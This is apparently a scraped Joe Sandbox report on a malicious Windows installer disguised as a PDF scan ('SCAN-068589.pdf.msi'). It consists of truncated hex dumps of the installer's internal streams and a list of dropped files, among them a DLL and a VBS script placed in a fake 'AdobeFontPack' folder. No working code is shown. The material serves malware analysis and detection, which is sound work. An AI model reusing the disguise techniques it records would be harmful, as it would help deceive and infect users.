Data Raw:	4d 53 43 46 00 00 00 00 e2 d2 02 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 02 00 00 00 00 00 00 00 60 00 00 00 0d 00 01 00 00 44 06 00 00 00 00 00 00 00 ce 54 27 6f 20 00 6d 61 69 6e 5f 64 6c 6c 00 44 00 00 00 00 44 06 00 00 00 d0 54 38 4d 20 00 6e 6f 74 69 66 79 5f 76 62 73 00 26 4a 8a cf 95 38 00 80 43 4b ec 7c 7f 5c 55 f5 fd ff c5 0b 7a 4b 14 2c 5a 6e 1f b7 68 b9 65 cb

General
Stream Path:	\x18496\x15167\x17394\x17464\x17841
File Type:	data
Stream Size:	656
Entropy:	4.728156136205491
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . " . " . " . ) . ) . ) . * . * . * . + . + . + . + . + . + . 1 . 1 . 1 . 9 . 9 . 9 . 9 . 9 . I . I . I . I . I . I . I . I . X . X . ] . ] . ] . ] . ] . ] . ] . ] . k . k . k . l . l . l . m . m . m . m . m . m . x . x . z . z . z . z . z . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . #
Data Raw:	07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 22 00 22 00 22 00 29 00 29 00 29 00 2a 00 2a 00 2a 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 31 00 31 00 31 00 39 00 39 00 39 00 39 00 39 00 49 00 49 00 49 00 49 00 49 00 49 00 49 00 49 00 58 00 58 00 5d 00 5d 00 5d 00 5d 00 5d 00 5d 00 5d 00 5d 00 6b 00 6b 00 6b 00 6c 00 6c 00 6c 00 6d 00 6d 00 6d 00 6d 00 6d 00 6d 00 78 00

General
Stream Path:	\x18496\x16191\x17783\x17516\x15210\x17892\x18468
File Type:	ASCII text, with very long lines, with no line terminators
Stream Size:	6703
Entropy:	4.830101882212788
Base64 Encoded:	True
Data ASCII:	N a m e T a b l e T y p e C o l u m n I d e n t i f i e r _ V a l i d a t i o n V a l u e N P r o p e r t y I d _ S u m m a r y I n f o r m a t i o n D e s c r i p t i o n S e t C a t e g o r y K e y T a b l e M a x V a l u e N u l l a b l e K e y C o l u m n M i n V a l u e N a m e o f t a b l e N a m e o f c o l u m n Y ; N W h e t h e r t h e c o l u m n i s n u l l a b l e Y M i n i m u m v a l u e a l l o w e d M a x i m u m v a l u e a l l o w e d F o r f o r e i g n k e y
Data Raw:	4e 61 6d 65 54 61 62 6c 65 54 79 70 65 43 6f 6c 75 6d 6e 49 64 65 6e 74 69 66 69 65 72 5f 56 61 6c 69 64 61 74 69 6f 6e 56 61 6c 75 65 4e 50 72 6f 70 65 72 74 79 49 64 5f 53 75 6d 6d 61 72 79 49 6e 66 6f 72 6d 61 74 69 6f 6e 44 65 73 63 72 69 70 74 69 6f 6e 53 65 74 43 61 74 65 67 6f 72 79 4b 65 79 54 61 62 6c 65 4d 61 78 56 61 6c 75 65 4e 75 6c 6c 61 62 6c 65 4b 65 79 43 6f 6c 75

General
Stream Path:	\x18496\x16191\x17783\x17516\x15978\x17586\x18479
File Type:	data
Stream Size:	852
Entropy:	3.2751779270113106
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ' . . . . . . . . . 6 . . . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . o . . . . . . . . . . . . . . . ; . . . . . . . . . . . > . . . . . . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . S . . . ^ . . . . . . . . . . . . . . . . . . . . . . . :
Data Raw:	00 00 00 00 04 00 02 00 05 00 02 00 00 00 00 00 04 00 02 00 06 00 02 00 0a 00 1b 00 0b 00 15 00 05 00 05 00 01 00 2d 00 0a 00 01 00 13 00 02 00 0b 00 04 00 03 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 09 00 02 00 08 00 02 00 0d 00 01 00 0e 00 01 00 03 00 01 00 1e 00 01 00 01 00 27 00 15 00 01 00 15 00 01 00 36 00 01 00 24 00 01 00 f5 00 01 00 0f 00 01 00 04 00 07 00

General
Stream Path:	\x18496\x16255\x16740\x16943\x18486
File Type:	data
Stream Size:	34
Entropy:	3.043731420625169
Base64 Encoded:	False
Data ASCII:	. . " . ) . * . + . 1 . 9 . I . X . ] . k . l . m . x . z . . .
Data Raw:	07 00 22 00 29 00 2a 00 2b 00 31 00 39 00 49 00 58 00 5d 00 6b 00 6c 00 6d 00 78 00 7a 00 85 00 8f 00

General
Stream Path:	\x18496\x16383\x17380\x16876\x17892\x17580\x18481
File Type:	data
Stream Size:	2016
Entropy:	2.3834058956899153
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . " . " . " . ) . ) . ) . * . * . * . + . + . + . + . + . + . 1 . 1 . 1 . 9 . 9 . 9 . 9 . 9 . I . I . I . I . I . I . I . I . X . X . ] . ] . ] . ] . ] . ] . ] . ] . k . k . k . l . l . l . m . m . m . m . m . m . x . x . z . z . z . z . z . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . % . ' . # . % . ' . # . % . ' . % . + . - . 0 . 3 . 6 . 1 . E . G . . . # . < . ? . B . . . 0 . 3 . I . K . M . P . R . Y . [ . ' . 3 . [ . ] . `
Data Raw:	07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 0b 00 0b 00 22 00 22 00 22 00 29 00 29 00 29 00 2a 00 2a 00 2a 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 31 00 31 00 31 00 39 00 39 00 39 00 39 00 39 00 49 00 49 00 49 00 49 00 49 00 49 00 49 00 49 00 58 00 58 00 5d 00 5d 00 5d 00 5d 00 5d 00 5d 00 5d 00 5d 00 6b 00 6b 00 6b 00 6c 00 6c 00 6c 00 6d 00 6d 00 6d 00 6d 00 6d 00

General
Stream Path:	\x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934
File Type:	data
Stream Size:	48
Entropy:	3.0684210940655055
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . x . < .
Data Raw:	9a 00 9b 00 9c 00 9d 00 9e 00 9f 00 a0 00 a1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 83 84 83 e8 83 78 85 dc 85 3c 8f a0 8f c8 99

General
Stream Path:	\x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472
File Type:	data
Stream Size:	24
Entropy:	2.594360937770434
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . .
Data Raw:	9a 00 9b 00 9c 00 a2 00 00 00 00 00 00 00 00 00 20 83 84 83 e8 83 14 85

General
Stream Path:	\x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472
File Type:	data
Stream Size:	42
Entropy:	2.865948479683034
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . x . . .
Data Raw:	9a 00 9c 00 9d 00 9e 00 a1 00 a3 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 83 e8 83 78 85 dc 85 c8 99 9c 98 00 99

General
Stream Path:	\x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486
File Type:	data
Stream Size:	4
Entropy:	1.5
Base64 Encoded:	False
Data ASCII:	. .
Data Raw:	b2 00 a5 00

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SCAN-068589.pdf.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\6ecb58.rbs

C:\Users\user\AppData\Local\AdobeFontPack\main.dll

C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs

C:\Users\user\AppData\Local\x86\5507.nls

C:\Windows\Installer\6ecb57.msi

C:\Windows\Installer\6ecb59.msi

C:\Windows\Installer\MSID0D5.tmp

C:\Windows\Installer\SourceHash{CC038BA5-7236-4713-8948-DFF082243638}

C:\Windows\Installer\inprogressinstallinfo.ipi

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

C:\Windows\Temp\~DF32CC1CCDA67698BF.TMP

C:\Windows\Temp\~DF451B68AA611F0002.TMP

C:\Windows\Temp\~DF554ED6AEAE1695CB.TMP

C:\Windows\Temp\~DF5D62286770078C98.TMP

C:\Windows\Temp\~DFAE475F7BF35B51FF.TMP

C:\Windows\Temp\~DFB6CC71FD7302A57F.TMP

C:\Windows\Temp\~DFB854D5FFFE3393EB.TMP

C:\Windows\Temp\~DFBD7FC4C706A2923E.TMP

C:\Windows\Temp\~DFC1AF1F970900AA0D.TMP

Windows Analysis Report
SCAN-068589.pdf.msi

General
Stream Path:	\x18496\x16911\x17892\x17784\x18472
File Type:	data
Stream Size:	32
Entropy:	2.472874329980682
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . .
Data Raw:	b2 00 b3 00 b3 00 00 00 b4 00 b6 00 b5 00 00 00 02 80 01 80 01 80 01 80 00 00 a7 00 00 80 00 80

General
Stream Path:	\x18496\x16918\x17191\x18468
File Type:	MIPSEB Ucode
Stream Size:	14
Entropy:	1.626688849701832
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . .
Data Raw:	01 80 02 00 00 80 00 00 c6 00 00 00 00 00

General
Stream Path:	\x18496\x16923\x17194\x17910\x18229
File Type:	data
Stream Size:	12
Entropy:	2.617492461184755
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	a8 00 01 80 d2 00 d3 00 d4 00 a5 00

General
Stream Path:	\x18496\x16923\x17584\x16953\x17167\x16943
File Type:	data
Stream Size:	10
Entropy:	1.9609640474436814
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	a7 00 a5 00 00 00 a7 00 02 80

General
Stream Path:	\x18496\x17165\x16949\x17894\x17778\x18492
File Type:	data
Stream Size:	18
Entropy:	2.102187170949333
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . .
Data Raw:	a7 00 ad 00 af 00 ad 00 af 00 00 00 ae 00 b0 00 b1 00

General
Stream Path:	\x18496\x17167\x16943
File Type:	data
Stream Size:	40
Entropy:	2.6659614479285128
Base64 Encoded:	False
Data ASCII:	. . . . . . . D . D . . . . . . . . . . . . . . . .
Data Raw:	b7 00 bb 00 a5 00 a5 00 b8 00 bc 00 00 44 06 80 44 00 00 80 b9 00 00 00 ba 00 00 00 00 82 00 82 01 00 00 80 02 00 00 80

General
Stream Path:	\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934
File Type:	data
Stream Size:	120
Entropy:	3.6961843239779912
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . @ . ( p . y
Data Raw:	9a 00 9b 00 9c 00 9d 00 9e 00 a0 00 a1 00 a3 00 a4 00 a9 00 ab 00 bd 00 be 00 bf 00 c0 00 c1 00 c2 00 c3 00 c4 00 c5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 83 84 83 e8 83 78 85 dc 85 a0 8f c8 99 9c 98 00 99 ca 99 c9 99 bc 82 40 86 08 87 28 8a ac 8d 88 93 70 97 d4 97 79 85

General
Stream Path:	\x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472
File Type:	data
Stream Size:	30
Entropy:	2.794949047732144
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . .
Data Raw:	9a 00 9b 00 9c 00 a2 00 bd 00 00 00 00 00 00 00 00 00 00 00 20 83 84 83 e8 83 14 85 bc 82

General
Stream Path:	\x18496\x17548\x17648\x17522\x17512\x18487
File Type:	data
Stream Size:	12
Entropy:	2.292481250360578
Base64 Encoded:	False
Data ASCII:	. . . . . . .
Data Raw:	a5 00 a6 00 a7 00 04 80 00 00 a8 00

General
Stream Path:	\x18496\x17753\x17650\x17768\x18231
File Type:	data
Stream Size:	24
Entropy:	2.792481250360579
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . .
Data Raw:	c7 00 c9 00 cb 00 cc 00 ce 00 d0 00 c8 00 ca 00 ba 00 cd 00 cf 00 d1 00